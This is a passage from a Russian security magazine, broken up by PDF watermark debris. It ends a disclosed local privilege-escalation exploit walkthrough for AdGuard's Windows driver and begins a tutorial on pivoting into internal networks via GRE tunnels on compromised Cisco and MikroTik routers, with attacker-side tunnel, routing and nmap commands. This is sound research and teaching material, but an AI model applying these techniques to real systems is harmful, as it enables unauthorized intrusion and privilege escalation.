Похоже , что здесь использует ся какой то хитрый многоуров невый список . Я так и не понял, для чего это нужно . Если тебе знакома такая организа ция данных , поделись в комментах .
Также нам доступен IOCTL-вызов ADG_EDIT_ITEM, который позволя ет редак тировать AdgItem по индексу. Контро лиру емые данные выделены красным .
Мы контро лируем адрес следующе го элемен та в списке ! Важно так
же отметить , что редактирова ние данных выполняет ся после успешного срав нения на равенство переданного индекса c adgItem.index.
ПО СЛЕДАМ ФАЗЗЕРА
DIBF вызвал ADG_INSERT_ITEM много много раз, затем через ADG_EDIT_ITEM повредил один из элемен тов списка . При следующем вызове ADG_EDIT_ITEM совершает ся обход этого списка в цикле while до момента , когда будет найден нужный элемент . Еще раз приведу листинг функции , в которой произо шел BSOD, но уже с пояснени ями.
Функция поиска элемен та в списке по индексу
Соответс твен но , в определен ный момент при разыменова нии adgItem.index переходим по коррапчен ному указате лю .
Продолжение статьи →
|
|
|
hang |
e |
|
|
|
|
||
|
|
C |
|
|
E |
|
|
|||
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
wClick |
|
c |
|
o m |
COVERSTORY |
||||
|
|
|
|
|
|
|||||
|
|
|
to |
BUY |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
.c |
|
||
|
. |
|
|
|
|
|
|
|
||
|
p |
|
|
|
|
|
g |
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
ha |
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
|||
← НАЧАЛО СТАТЬИ w. |
|
|
c |
|
|
||||
|
|
|
|
.co |
|
||||
|
|
|
to |
BUY |
|
|
|
|
|
w Click |
|
|
|
|
|
m |
|||
w |
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
-x ha |
|
|
|
|
ИЩЕМ И ЭКСПЛУАТИРУЕМ УЯЗВИМОСТЬ В ДРАЙВЕРЕ
ADGUARD ДЛЯ WINDOWS
ЕЩЕ НЕМНОГО РЕВЕРСА
Через кросс референсы на функцию AdgGetByIndexFromPool() находим еще один нужный IOCTL ADG_UNLINK_ITEM. Он удаляет элемент из списка singly-linked по индексу.
Удаление элемен та из списка . Контро лиру емые атакующим данные попадают напрямую в FLT3
Посколь ку мы контро лиру ем AdgItem.pNextItem, это позволя ет писать наши данные прямо в область FLT3 по одному DWORD.
ПРИМИТИВЫ
Исполь зуя разные комбинации найден ных IOCTL, мы получаем два мощных примити ва. Оба основаны на коррапте singly-linked-списка .
Примитив первый . Комбинация ADG_INSERT_ITEM, ADG_EDIT_ITEM,
ADG_UNLINK_ITEM позволя ет писать последова тель ность байтов в пул FLT3. Это дает возможность крафтить фейковые структуры в памяти ядра и обходить
SMAP.
Первый примитив . Запись последова тель ных байтов в FLT3
Однако в таком примити ве мало толку , если мы не знаем адрес записываемых данных . KASLR располага ет FLT3 по случай ному адресу .
Примитив второй . Дополняем предыду щую комбинацию . В IOCTL ADG_EDIT_ITEM передадим валидные ядерные адреса и в цепочку IOCTL добавим еще один вызов ADG_EDIT_ITEM — мощней ший примитив arbitrary write 16 bytes, то есть «произволь но запиши 16 байт в память ядра».
Второй примитив записи 16 байт в память ядра
Обрати внимание , что, например , первые пять DWORD в FLT3 мы можем использовать для создания структур , а шестой — для нашего примити ва про извольной записи.
На этом этапе исследова ния вырисовыва ется возможный экспло ит. Используя эти примити вы , мы можем создавать свои объекты в ядре.
Но для полноцен ного использования примити вов нужно решить три кри тические проблемы .
Проблемы 1 и 2. KASLR
Бинар ные митигации Windows усложняют эксплу ата цию . Это, конечно , классно , что мы можем заполнять FLT3 контро лиру емы ми данными , но этого мало. Если мы хотим скрафтить там какой нибудь объект ядра, нужно знать адрес, чтобы им восполь зовать ся . Также нам надо знать адрес какого нибудь объекта ядра, чтобы перелинковать список на него.
Обратим ся к репозиторию windows kernel address leaks. Хоть в последний раз туда коммитили в 2017 году, техники до сих пор рабочие.
Таблица техник утечки адресов ядра
Большинс тво техник основаны на вызове вот этой недокумен тирован ной фун кции из ntdll:
NtQuerySystemInformation()
Один из вызовов сможет слить адреса всех невыгружа емых пулов (non-paged pool), где мы без труда отыщем тег FLT3. Другой вызов сливает адреса EPROCESS’ов, токенов и так далее. Но прежде чем выбрать ядерную струк туру, надо обсудить проблему номер три.
Проблема 3. Сравнение с index
Несмотря на то что мы исследуем 32-битный драйвер , в структуре adgItem индекс хранит ся в двух DWORD. А значение g_AdgItemsCounter, которым он инициали зируется, хранит ся в одном DWORD. Следова тельно, второй DWORD всегда будет равен нулю.
adgItem в памяти ядра
Предположу , что это связано с использовани ем инструк ции _aullrem для деления с остатком, которая работает с 64-битными целыми в 32битных системах .
0xBCC — это adgItem.index. За ним всегда будет следовать NULL DWORD (выделены красным ). Если удастся перелинковать singly-linked-список на какой нибудь объект ядра с паттерном «предска зуемый DWORD, NULL DWORD», то сможем пройти провер ку и записать следующие 16 байт контро лируемы ми данными (выделены черным на рисунке выше).
Функция записи контро лиру емых 16 байт в память ядра
Почему первый DWORD должен быть предска зуем (то есть мы должны знать его из юзермода заранее)? Нам надо передать в IOCTL ADG_EDIT_ITEM индекс элемен та, который будет сравнивать ся с этим DWORD. Если провер ка на равенство не прошла , то код драйвера побежит дальше по singly-linked- списку и ОС выпадет в BSOD, аналогич но тому, как это было во время фаз зинга.
Итак, подытожим , какой объект ядра нам нужен для произволь ной записи:
•адрес объекта протека ет через Windows Kernel Address Leaks;
•в лейауте объекта есть память, удовлетво ряющая паттерну «предска зуемый DWORD, NULL DWORD». В качестве предска зуемого DWORD идеаль но подойдет DWORD с флагами ;
•изменение 16 байт за паттерном в объекте приводит к повышению при вилегий .
Ключ, позволя ющий записывать 16 байт в ядре, у нас есть, осталось найти замок, к которому этот ключ подойдет .
ЭКСПЛУАТАЦИЯ
Дальше методично изучаем репозиторий Windows Kernel Address Leaks, смот рим, какие структуры ядра протека ют , и ищем что нибудь подходящее под критерии выше.
Можно ликануть адрес структуры EPROCESS, а значит , можно вычислить адрес OBJECT_HEADER:
EPROCESS - sizeof(OBJECT_HEADER)
Давай взглянем на структуру OBJECT_HEADER сервисно го процес са
AdguardSvc.exe.
Для эксплу ата ции подойдет OBJECT_HEADER любого привиле гиро ван ного процес са , просто я выбрал процесс сервиса этого же вендора .
Красным выделена память, подходящая под паттерн , — предска зуемый DWORD равен шести , за ним следует NULL DWORD. Шесть — это количество открытых хендлов для объекта процес са OBJECT_HEADER.HandleCount.
Экспло ит получается не самый надежный , потому что мы не контро лиру ем тех, кто открывает хендл. Если, например , антивирус решит открыть процесс для сканиро вания памяти, то это значение станет равным семи и экспло ит уро нит ОС в BSOD. Но мы не пишем экспло ит на продажу , а изучаем устройство Windows, поэтому слегка пожертву ем надежностью .
Паттерн мы нашли , значит , можно будет перезаписать следующие 16 байт, а среди них — указатель на дескрип тор безопасности (Security Descriptor)! Это указатель типа EX_FAST_REF на структуру , которая содержит DACL и опи сывает права доступа к объекту .
Подробнее про указатель типа EX_FAST_REF
на сайте CodeMachine.
Security Descriptor высокопривиле гиро ван ного процес са
Обрати внимание на наличие флагов SE_DACL_PRESENT и SE_SACL_PRESENT. Их присутс твие значит , что DACL и SACL заданы явно. DACL содержит два ACE — высокопривиле гиро ван ные пользовате ли NT SYSTEM и члены группы админис траторов могут открыть хендл процес са для разных операций .
C SACL все не так очевид но . System Access Control List (SACL) содержит не только атрибуты логирования доступа к объекту , но и его уровень целос тности (integrity level), очень важное поле, когда мы говорим о защите объ ектов в Windows. В нашем случае это высокий уровень целостнос ти ML_SYSTEM.
Что будет, если мы выключим эти флаги ? DACL и SACL станут NULL.
Security Descriptor после выключения флагов
А что значит NULL-указатель в этих полях для дескрип тора безопасности ? Обратим ся к MSDN. Там написа но , что DACL, равный null, дает полный доступ любому пользовате лю , который его запросит . Звучит многообе щающе ! Нулевой SACL значит , что «объект будет обрабаты вать ся как имеющий сред нюю целостность ». Обычный пользователь как раз имеет средний уровень целостнос ти .
Говоря простым языком , привиле гиро ван ный объект с DACL/SACL, равным NULL, может быть открыт простым пользовате лем . Получаем локальное повышение привиле гий .
Это легко проверить . Откроем AdguardSvc.exe после выключения
SE_DACL_PRESENT и SE_SACL_PRESENT и попробу ем инжектнуть в процесс какую нибудь DLL. Успех.
Инжект DLL в привиле гированный процесс после отключения флагов
SE_DACL_PRESENT, SE_SACL_PRESENT
Грубо говоря, при открытии объекта субъектом компонент Windows Security Reference Monitor
сравнива ет SID в токене субъекта (пользовате ля) с ACE в дескрип торе безопасности объекта . Дес крипторы безопасности уже были в моей статье, а про токен ты можешь почитать в статье «Изу чаем возможнос ти WinAPI для пентесте ра».
Это значит , что первым примити вом мы можем скрафтить слабый Security Descriptor в FLT3-области памяти и вторым примити вом переписать указатель
на него.
Однако примити вом мы переписыва ем 16 байт, из них указатель занимает только четыре. Давай еще раз взглянем на OBJECT_HEADER и посмотрим , что находится под остальными 12 байтами .
16 байт (4 DWORD), которые перезаписы вают ся в обязатель ном порядке (выделены черным )
Оставши еся 12 байт из 16 тоже надо проверить . ObjectCreateInfo можно переписать нулями, и BSOD’а не будет. Провере но эксперимен тально. Про дескрип тор безопасности мы уже поговорили . EPROECSS.Header.Lock имеет константное значение 3, спокой но перезаписы ваем тем же значени ем. С флагами 0x88 та же история . Остался один байт 0xC4 OBJECT_HEADER.
TypeIndex.
В Windows 10 OBJECT_HEADER.TypeIndex — это указатель в таблице nt!
ObTypeIndexTable, поксорен ный с nt!ObHeaderCookie. Значение nt! ObHeaderCookie нам, юзермодным эксплу ата торам , неизвес тно . Значит , мы не знаем , чем его перезаписы вать , используя примитив .
A Light on Windows 10’s “OBJECT_HEADER- >TypeIndex” — хорошая статья на тему TypeIndex в разных версиях ОС.
Таким образом Windows предот вращает атаку через использование функции
ObfDereferenceObject(). Повредив TypeIndex, можно перехватить управле
ние в ядре. Более подробно читай в статье CVE-2018-8611 Exploiting Windows Аарона Адамса .
Ломает ли это эксплу атацию? Нет. Во первых , коррапт OBJECT_HEADER. TypeIndex не вываливает Windows в BSOD. Мы всего лишь получим ошибку при вызове CreateProcess() из юзермода .
Проведем простой эксперимент : откроем notepad.exe, в WinDbg пов редим его TypeIndex и попробу ем открыть процесс .
Ошибка при открытии процес са с поврежден ным
OBJECT_HEADER.TypeIndex
Теперь восста новим значение и попробу ем сделать это снова .
Успешное выполнение команды
TypeIndex — это всего лишь байт, значит , его можно быстро сбрутить — используем примитив arbitrary write 16 bytes с новым OBJECT_HEADER. TypeIndex (но с тем же самым дескрип тором безопасности ) и пробуем выз вать следующую функцию :
CreateProcess(PROCESS_ALL_ACCESS)
Когда подберем нужное значение , нам вернется хендл процес са . После этого сервисный процесс становит ся полностью подкон троль ным , и мы можем инжектиться в него как угодно . Я буду делать это классичес кой комбинаци ей
WriteProcessMemory() + CreateRemoteThread().
Цепоч ка атаки готова. Пройдем ся по ее шагам еще раз.
Шаг 0. Начальное состояние . Пул FLT3 пустой . Сервисный процесс защищен строгим дескрип тором безопасности .
Шаг 1. Ликаем адрес в пространс тве ядра FLT3 и EPROCESS AdguardSvc.exe.
Важное примеча ние : SYSTEM_HANDLE_INFORMATION сливает адреса EPROCESS, и по одному адресу не понять, какому юзермодно му процес су он принад лежит . Поэтому здесь используем эвристику :
•собира ем все EPROCESS первый раз;
•запус каем сервис , благо эта операция доступна непривиле гированному пользовате лю. Стартует процесс AdguardSvc.exe;
•собира ем все EPROCESS второй раз;
•ищем разницу двух множеств , единствен ный найден ный EPROCESS будет принад лежать AdguardSvc.exe.
Едем дальше .
Шаг 2. Через примитив записи в FLT3 заносим туда слабый дескрип тор безопасности (DACL/SACL NULL). Посколь ку адрес FLT3 нам известен из пре дыдущего шага, мы знаем , по какому адресу ядра произош ла запись.
Важное примеча ние: Chunk в FLT3 — это четыре DWORD’а: NULL, 8, NULL, NULL}. Их нужно поместить перед дескрип тором безопасности , чтобы не получить BSOD с INVALID_REF_COUNT. Предполагаю , что это служеб ная инфа хип менеджера .
Шаг 3. С помощью примити ва arbitrary write 16 bytes перезаписы ваем ука затель на дескрип тор безопасности с исходного на слабый .
Шаг 4. Используя этот же примитив , брутфорсим OBJECT_HEADER.TypeIndex, пока не получим хендл сервисно го процес са .
Шаг 5. Инжектимся в сервисный процесс . Таким образом мы повысили при вилегии в системе . Код экспло ита я опубликовал на своем GitHub.
ДЕМОНСТРАЦИЯ (ВИДЕО)
•17.08.2022 — уязвимость зарепорчена вендору ;
•17.08.2022 — вендор взял репорт в работу;
•26.08.2022 — подтвержде ние от вендора , выплата багбаун ти ;
•24.10.2022 — фикс в версии 7.11;
•27.01.2023 — публикация .
|
|
|
hang |
e |
|
|
|
|
||
|
|
C |
|
|
E |
|
|
|||
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
wClick |
|
BUY |
o m |
ВЗЛОМ |
|||||
|
to |
|
|
|
||||||
|
|
|
|
|
|
|
|
|||
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
c |
|
|
|
.c |
|
||
|
. |
|
|
|
|
|
|
|||
|
p |
|
|
|
|
|
g |
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
|||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
КАК РАБОТАЕТ GRE-ПИВОТИНГ ПОВЕРХ СЕТЕВОГО ОБОРУДОВАНИЯ
При настрой ке средств защиты сетевое оборудо вание часто остается без вни мания админис тра торов , что повышает вероятность взлома и получения контро ля над такими устройства ми . Что, если зло умышленник уже добился контро ля над погранич ным оборудо вани ем ? Смо жет ли он подобрать ся к внутренней инфраструктуре ?
Caster
Network Security Expert t.me/c4s73r_channel c4s73r@protonmail.com
Пивотинг (от английско го pivoting, а не от слова «пиво») — это набор техник , которые позволя ют получить доступ к внутренним ресурсам , минуя сетевую изоляцию , сетевые средства защиты, файрвол . Достаточ но много было ска зано о проведе нии пивотинга через традици онные службы SSH, OVPN и дру гие. Но в своем исследова нии я продемонс три рую нетрадици онные приемы пивотинга сквозь погранич ное сетевое оборудо вание с использовани ем про токола GRE.
|
Статья имеет ознакоми |
тель ный |
характер и пред |
|||||||||||
|
назначена |
для |
специалис |
тов |
по безопасности |
, |
||||||||
|
проводя |
щих |
тестирова |
ние |
в рамках |
контрак та . |
||||||||
|
Автор и |
редакция |
не несут |
|
ответствен ности |
|||||||||
|
за любой вред, причинен ный |
с примене нием |
||||||||||||
|
изложен ной |
информации . Распростра |
нение |
вре |
||||||||||
|
доносных |
программ , нарушение |
работы систем |
|||||||||||
|
и нарушение |
тайны |
переписки преследу |
ются |
||||||||||
|
по закону. |
|
|
|
|
|
|
|
|
|
|
|
|
GRE
GRE (Generic Routing Encapsulation) — это протокол инкапсуляции сетевых IP-
пакетов, разработан ный инженера ми Cisco. В продак шене он получил боль шую популярность , посколь ку решает проблемы создания VPN-каналов для организа ций. GRE проводит инкапсуляцию напрямую в IP-пакет, минуя транспортный уровень . Кстати говоря, в контек сте IP-пакета у GRE есть свой числовой идентифика тор — 47. По сути, GRE не предос тавляет никаких средств защиты туннелиру емых данных . Поэтому в продак шене обычно скре щивают GRE и IPSec для обеспечения безопасности данных . В этой статье я совсем немного расска жу о GRE, чтобы ты понимал, зачем он нам понадобил ся.
Простой пример GRE-туннеля
GRE-туннелиро вание здесь подразуме вает три сущности :
•Delivery Header. Представ ляет собой IP-пакет с публичны ми адресами источника /назначения . Благода ря ему инкапсулиро ванный пакет сможет достичь адресата в сети Интернет. Его размер — 20 байт;
•GRE-пакет. Его размер — 4 байта ;
•пассажир . Это полезные данные , трафик , сгенери рованные легитимными службами .
Служеб ные заголовки GRE
|
|
|
Структура |
GRE версии 0 |
|
|
|
|
|
||||||
|
|
|
|
|
|||||||||||
У GRE есть две версии |
— 0 и 1. На картинке |
выше представ лена |
структура |
||||||||||||
нулевой версии |
протоко ла |
GRE. |
Именно |
она обычно |
и использует ся . |
||||||||||
Как видишь, большинс тво заголовков здесь опциональ |
ные , то есть хранимые |
||||||||||||||
там значения |
есть не всегда и появляют |
ся лишь в специфич ных |
сценари ях . |
||||||||||||
GRE также носит идентифика тор |
инкапсулиру |
юще го протоко ла в заголовке |
|||||||||||||
Protocol Type. Под каждый |
протокол |
есть свой идентифика тор : например , |
|||||||||||||
для пакета IPv4 этот идентифика тор равен 0x0800. |
|
|
|
|
Идентифика тор IPv4-пакета внутри GRE-заголовка
Подробнее о GRE читай в докумен те RFC.
ЛАБОРАТОРНАЯ СЕТЬ
В качестве лаборатор ного стенда выступит сеть, изображен ная на схеме .
Тополо гия лаборатор ной сети
Это типичная корпоратив ная сеть с тремя уровнями (уровень доступа , распре деления и ядра). В качестве динамичес кой маршру тизации использует ся про токол OSPF, для отказоус тойчивости доступнос ти шлюза — HSRP. Имеем четыре коммутато ра уровня доступа и четыре сети VLAN со своей адресаци ей. Также подклю чен отдельный коммутатор уровня распре деления, за ним сеть
192.168.20.0/24.
В качестве Edge Router будут выступать Cisco CSR и Mikrotik CHR v. 6.49.6.
С атакующей стороны машина с Kali Linux и публичным IP-адресом — для примера атаки из интернета . Предположим , что атакующий каким то обра зом получил доступ к панели управления погранич ным маршру тизатором, пос кольку продемонс трировать мы хотим пивотинг, а это, как известно , один из шагов во время постэкс плуатации.
L3 GRE VPN ПОВЕРХ CISCO IOS
Продемонс три рую небольшой пример организа ции L3-туннеля во внутреннюю сеть, которая находится за самим погранич ным роутером . Вообще , принципы настрой ки GRE не отличают ся у всех вендоров сетевого оборудо вания , вопрос лишь в разном синтакси се . Давай для начала посмотрим , как настра ивать
Cisco.
Конфигура ция GRE в Cisco IOS включает следующее :
•создание логического интерфейса ;
•указание режима, в котором будет работать туннель (GRE);
•назначение адреса на интерфейс (здесь возьмем адреса 172.16.0.1
для Kali и 172.16.0.2 для Cisco CSR);
•задание адреса источника 212.100.144.100;
•задание адреса назначения 100.132.55.100.
EdgeGW(config)# interface tunnel 1
EdgeGW(config-if)# tunnel mode gre ip
EdgeGW(config-if)# ip address 172.16.0.2 255.255.255.0
EdgeGW(config-if)# tunnel source 212.100.144.100
EdgeGW(config-if)# tunnel destination 100.132.55.100
Теперь черед второй стороны GRE-туннеля . В нашем случае этой «второй сто роной» будет хост атакующе го. Linux прекрасно поддержи вает работу с GRE при наличии необходимо го модуля ядра ip_gre. А он есть почти везде .
Здесь шаги такие:
•импорт модуля ядра;
•создание логического интерфейса с указани ем типа, адресов источника и назначения ;
•назначение адреса на логическом интерфейсе ;
•включение интерфейса .
c4s73r@kali:~$ sudo modprobe ip_gre
c4s73r@kali:~$ sudo ip link add name evilgre type gre local 100.
132.55.100 remote 212.100.144.100
c4s73r@kali:~$ sudo ip addr add 172.16.0.1/24 dev evilgre
c4s73r@kali:~$ sudo ip link set evilgre up
Проверим работу туннеля через пинг до туннель ного интерфейса Cisco CSR.
Пинг атакующе го до второй стороны туннеля
Пинг от Cisco CSR
Посмотрим на таблицу маршру тиза ции , добавим некоторые маршру ты до под сетей, чтобы проверить доступность .
Таблица маршру тиза ции погранич ного роутера Cisco CSR
Прописы ваем маршру ты до целевых подсетей . Адресом шлюза в данном слу чае будет адрес логического GRE-интерфейса роутера Cisco CSR — 172.16.
0.2.
c4s73r@kali:~$ sudo route add -net 10.10.50.0 netmask 255.255.255.
0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net 10.10.110.0 netmask 255.255.
255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net 10.10.140.0 netmask 255.255.
255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net 10.10.210.0 netmask 255.255.
255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net 192.168.20.0 netmask 255.255.
255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo nmap -n -p 22 -iL targets -oA result
Резуль таты сканиро вания SSH внутренней инфраструктуры
Пример но так будет выглядеть пакет с инкапсуляци ей, если атакующий вза имодей ствует с внутренней сетью (ICMP, на примере внутренней подсети наз
начения 192.168.20.0/24).
L3 GRE VPN ПОВЕРХ ROUTEROS
Теперь продемонс три рую пример на оборудо вании Mikrotik. Здесь абсолют но те же принципы настрой ки , разница лишь в синтакси се и иерархии расположе ния сущностей (интерфейсы , IP-адресация и так далее).
Здесь приведе ны команды именно для RouterOS v. 6.
Создаем логический интерфейс GRE, назнача ем ему адрес, прописы ваем адрес удален ной стороны :
[admin@EdgeGW] /interface/gre> add name=gre_pivoting remote-
address=100.132.55.100 allow-fast-path=no
[admin@EdgeGW] /interface/address> add address=172.16.0.2 netmask=
255.255.255.0 interface=gre_pivoting
Сторона атакующе го. Все то же самое, что было в части про L3 VPN поверх
Cisco:
c4s73r@kali:~$ sudo modprobe ip_gre
c4s73r@kali:~$ sudo ip link add name evilgre type gre local 100.
132.55.100 remote 212.100.144.100
c4s73r@kali:~$ sudo ip addr add 172.16.0.1/24 dev evilgre
c4s73r@kali:~$ sudo ip link set evilgre up
Проверим работу туннеля GRE и ICMP:
[admin@EdgeGW] > ping 172.16.0.1
c4s73r@kali:~$ ping 172.16.0.2
Смотрим в таблицу маршру тизации /ip route print и добавляем некоторые маршру ты для провер ки сетевой связности .
c4s73r@kali:~$ sudo route add -net 10.10.50.0 netmask 255.255.255.
0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net 10.10.110.0 netmask 255.255.
255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net 10.10.140.0 netmask 255.255.
255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net 10.10.210.0 netmask 255.255.
255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net 192.168.20.0 netmask 255.255.
255.0 gw 172.16.0.2
Проверим сетевую связность до хостов этих подсетей . ICMP Ping Sweep.
Вот таким образом можно обеспечить L3 GRE туннель на примере Cisco IOS и RouterOS. Однако в продак шене встречают ся разные сетевые инфраструк туры со специфи чес кими конфигура циями оборудо вания . Желательно перед постро ением GRE-туннеля полностью изучить конфигура цию маршру тизатора — вдруг дальнейше му прохож дению трафика мешает ACL или, нап ример, есть нужда в анонсирова нии сети GRE-туннеля , если мы говорим о динамичес кой маршру тиза ции .
ОБЕСПЕЧЕНИЕ ТУННЕЛЯ L2 GRE С ПОДДЕРЖКОЙ L2-АТАК
Для решения этой проблемы существу ет TAP-интерфейс. TAP — это виртуаль ный сетевой драйвер , он позволя ет эмулиро вать Ethernet-устройство и работа ет на канальном уровне сети (L2), опериру ет именно Ethernet-кадрами . Сам GRE отлично работает с TAP-интерфейсами : Ethernet-кадр будет инкапсулиро ван в туннель GRE, что, в свою очередь , дает возможность L2-доступа до цели. Вообще , TAP-интерфейсы используют ся в продак шене для создания сетевых мостов .
Сам туннель L2 мы постро им поверх туннеля L3, то есть получится GRE over GRE. Через туннель L3 мы сможем создать туннель L2 до целевой машины Relapse (предполага ется , что атакующий уже получил контроль над ней). Эта машина представ ляет собой сервер на Ubuntu 22.04 с двумя интерфейсами .
На стороне атакующе го идентичная ситуация с настрой кой GRE L3, однако создаем именно интерфейс GRETAP.
c4s73r@kali:~$ sudo modprobe ip_gre
c4s73r@kali:~$ sudo ip link add name evilgretap type gre local
172.16.0.1 remote 192.168.20.20
c4s73r@kali:~$ sudo ip link set evilgretap up
Сторона целевого хоста . Выясним , что здесь с интерфейсами .
Интерфей сы машины Relapse
Продолжение статьи →